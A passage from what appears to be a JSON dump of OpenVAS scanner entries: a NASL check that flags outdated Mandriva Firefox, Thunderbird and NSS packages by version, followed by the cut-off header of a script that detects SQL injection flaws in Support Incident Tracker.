isrpmvuln(pkg:\"firefox-mai\", rpm:\"firefox-mai~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ml\", rpm:\"firefox-ml~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nso\", rpm:\"firefox-nso~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-or\", rpm:\"firefox-or~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sr\", rpm:\"firefox-sr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta\", rpm:\"firefox-ta~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta_LK\", rpm:\"firefox-ta_LK~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-vi\", rpm:\"firefox-vi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zu\", rpm:\"firefox-zu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird\", rpm:\"mozilla-thunderbird~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ar\", rpm:\"mozilla-thunderbird-ar~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-be\", rpm:\"mozilla-thunderbird-be~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bg\", rpm:\"mozilla-thunderbird-bg~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bn_BD\", rpm:\"mozilla-thunderbird-bn_BD~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-br\", rpm:\"mozilla-thunderbird-br~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ca\", rpm:\"mozilla-thunderbird-ca~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-cs\", rpm:\"mozilla-thunderbird-cs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-da\", rpm:\"mozilla-thunderbird-da~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-de\", rpm:\"mozilla-thunderbird-de~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-el\", rpm:\"mozilla-thunderbird-el~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-en_GB\", rpm:\"mozilla-thunderbird-en_GB~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail\", rpm:\"mozilla-thunderbird-enigmail~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ar\", rpm:\"mozilla-thunderbird-enigmail-ar~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ca\", rpm:\"mozilla-thunderbird-enigmail-ca~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-cs\", rpm:\"mozilla-thunderbird-enigmail-cs~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-de\", rpm:\"mozilla-thunderbird-enigmail-de~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-el\", rpm:\"mozilla-thunderbird-enigmail-el~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-es\", rpm:\"mozilla-thunderbird-enigmail-es~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fi\", rpm:\"mozilla-thunderbird-enigmail-fi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fr\", rpm:\"mozilla-thunderbird-enigmail-fr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-it\", rpm:\"mozilla-thunderbird-enigmail-it~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ja\", rpm:\"mozilla-thunderbird-enigmail-ja~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ko\", rpm:\"mozilla-thunderbird-enigmail-ko~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nb\", rpm:\"mozilla-thunderbird-enigmail-nb~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nl\", rpm:\"mozilla-thunderbird-enigmail-nl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pl\", rpm:\"mozilla-thunderbird-enigmail-pl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt\", rpm:\"mozilla-thunderbird-enigmail-pt~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt_BR\", rpm:\"mozilla-thunderbird-enigmail-pt_BR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ru\", rpm:\"mozilla-thunderbird-enigmail-ru~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sl\", rpm:\"mozilla-thunderbird-enigmail-sl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sv\", rpm:\"mozilla-thunderbird-enigmail-sv~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-tr\", rpm:\"mozilla-thunderbird-enigmail-tr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-vi\", rpm:\"mozilla-thunderbird-enigmail-vi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_CN\", rpm:\"mozilla-thunderbird-enigmail-zh_CN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_TW\", rpm:\"mozilla-thunderbird-enigmail-zh_TW~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_AR\", rpm:\"mozilla-thunderbird-es_AR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_ES\", rpm:\"mozilla-thunderbird-es_ES~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-et\", rpm:\"mozilla-thunderbird-et~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-eu\", rpm:\"mozilla-thunderbird-eu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fi\", rpm:\"mozilla-thunderbird-fi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fr\", rpm:\"mozilla-thunderbird-fr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fy\", rpm:\"mozilla-thunderbird-fy~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ga\", rpm:\"mozilla-thunderbird-ga~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gd\", rpm:\"mozilla-thunderbird-gd~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gl\", rpm:\"mozilla-thunderbird-gl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-he\", rpm:\"mozilla-thunderbird-he~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-hu\", rpm:\"mozilla-thunderbird-hu~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-id\", rpm:\"mozilla-thunderbird-id~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-is\", rpm:\"mozilla-thunderbird-is~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-it\", rpm:\"mozilla-thunderbird-it~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ja\", rpm:\"mozilla-thunderbird-ja~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ko\", rpm:\"mozilla-thunderbird-ko~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lightning\", rpm:\"mozilla-thunderbird-lightning~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lt\", rpm:\"mozilla-thunderbird-lt~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nb_NO\", rpm:\"mozilla-thunderbird-nb_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nl\", rpm:\"mozilla-thunderbird-nl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nn_NO\", rpm:\"mozilla-thunderbird-nn_NO~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pl\", rpm:\"mozilla-thunderbird-pl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_BR\", rpm:\"mozilla-thunderbird-pt_BR~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_PT\", rpm:\"mozilla-thunderbird-pt_PT~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ro\", rpm:\"mozilla-thunderbird-ro~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ru\", rpm:\"mozilla-thunderbird-ru~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-si\", rpm:\"mozilla-thunderbird-si~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sk\", rpm:\"mozilla-thunderbird-sk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sl\", rpm:\"mozilla-thunderbird-sl~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sq\", rpm:\"mozilla-thunderbird-sq~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sv_SE\", rpm:\"mozilla-thunderbird-sv_SE~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ta_LK\", rpm:\"mozilla-thunderbird-ta_LK~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-tr\", rpm:\"mozilla-thunderbird-tr~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-uk\", rpm:\"mozilla-thunderbird-uk~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-vi\", rpm:\"mozilla-thunderbird-vi~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_CN\", rpm:\"mozilla-thunderbird-zh_CN~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_TW\", rpm:\"mozilla-thunderbird-zh_TW~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nsinstall\", rpm:\"nsinstall~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts-java\", rpm:\"rootcerts-java~20120218.00~1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-l10n\", rpm:\"mozilla-thunderbird-l10n~10.0.2~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.13.1~0.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-22T16:44:16", "bulletinFamily": "scanner", "cvelist": [], "description": "This host is running Support Incident Tracker and is prone to SQL\n injection vulnerabilities.", "modified": "2018-10-20T00:00:00", "published": "2011-08-02T00:00:00", "id": "OPENVAS:1361412562310902703", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902703", "type": "openvas", "title": "Support Incident Tracker SiT! Multiple SQL Injection Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_support_incident_tracker_mult_sql_inj_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Support Incident Tracker SiT! Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:sitracker:support_incident_tracker\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902703\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-02 09:08:31 +0200 (Tue, 02 Aug 2011)\");\n script_bugtraq_id(48896);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Support Incident Tracker SiT! Multiple SQL Injection Vulnerabilities\");\n 